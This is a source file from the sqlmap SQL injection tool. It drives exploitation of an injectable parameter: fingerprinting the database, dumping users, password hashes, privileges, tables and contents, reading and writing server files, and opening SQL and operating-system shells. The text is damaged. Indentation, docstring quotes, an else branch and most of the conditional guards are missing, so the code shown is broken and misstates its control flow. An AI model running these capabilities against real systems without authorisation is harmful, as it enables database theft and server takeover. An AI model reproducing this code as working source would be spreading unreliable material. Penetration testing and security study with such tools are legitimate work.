$Id: action.py 327 2009-01-12 21:35:38Z inquisb $
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
Copyright (c) 2006-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
and Daniele Bellucci <daniele.bellucci@gmail.com>
sqlmap is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation version 2 of the License.
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
You should have received a copy of the GNU General Public License along
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
from lib.controller.handler import setHandler
from lib.core.common import getHtmlErrorFp
from lib.core.data import conf
from lib.core.data import kb
from lib.core.dump import dumper
from lib.core.exception import sqlmapUnsupportedDBMSException
from lib.core.settings import SUPPORTED_DBMS
from lib.techniques.blind.timebased import timeTest
from lib.techniques.inband.union.test import unionTest
from lib.techniques.outband.stacked import stackedTest
This function exploits the SQL injection on the affected
url parameter and extracts requested data from the
back-end database management system or operating system
# First of all we have to identify the back-end database management
# system to be able to go ahead with the injection
conf.dbmsHandler = setHandler()
if not conf.dbmsHandler:
htmlParsed = getHtmlErrorFp()
errMsg = "sqlmap was not able to fingerprint the "
errMsg += "back-end database management system"
errMsg += ", but from the HTML error page it was "
errMsg += "possible to determinate that the "
errMsg += "back-end DBMS is %s" % htmlParsed
if htmlParsed and htmlParsed.lower() in SUPPORTED_DBMS:
errMsg += ". Do not specify the back-end DBMS manually, "
errMsg += "sqlmap will fingerprint the DBMS for you"
errMsg += ". Support for this DBMS will be implemented if "
errMsg += "you ask, just drop us an email"
raise sqlmapUnsupportedDBMSException, errMsg
print "%s\n" % conf.dbmsHandler.getFingerprint()
dumper.string("stacked queries support", stackedTest())
dumper.string("time based blind sql injection payload", timeTest())
dumper.string("valid union", unionTest())
dumper.string("banner", conf.dbmsHandler.getBanner())
if conf.getCurrentUser:
dumper.string("current user", conf.dbmsHandler.getCurrentUser())
dumper.string("current database", conf.dbmsHandler.getCurrentDb())
dumper.string("current user is DBA", conf.dbmsHandler.isDba())
dumper.lister("database management system users", conf.dbmsHandler.getUsers())
if conf.getPasswordHashes:
dumper.userSettings("database management system users password hashes",
conf.dbmsHandler.getPasswordHashes(), "password hash")
if conf.getPrivileges:
dumper.userSettings("database management system users privileges",
conf.dbmsHandler.getPrivileges(), "privilege")
dumper.lister("available databases", conf.dbmsHandler.getDbs())
dumper.dbTables(conf.dbmsHandler.getTables())
dumper.dbTableColumns(conf.dbmsHandler.getColumns())
dumper.dbTableValues(conf.dbmsHandler.dumpTable())
conf.dbmsHandler.dumpAll()
dumper.string(conf.query, conf.dbmsHandler.sqlQuery(conf.query))
conf.dbmsHandler.sqlShell()
# File system options
dumper.string(conf.rFile, conf.dbmsHandler.readFile(conf.rFile))
dumper.string(conf.wFile, conf.dbmsHandler.writeFile(conf.wFile))
conf.dbmsHandler.osShell()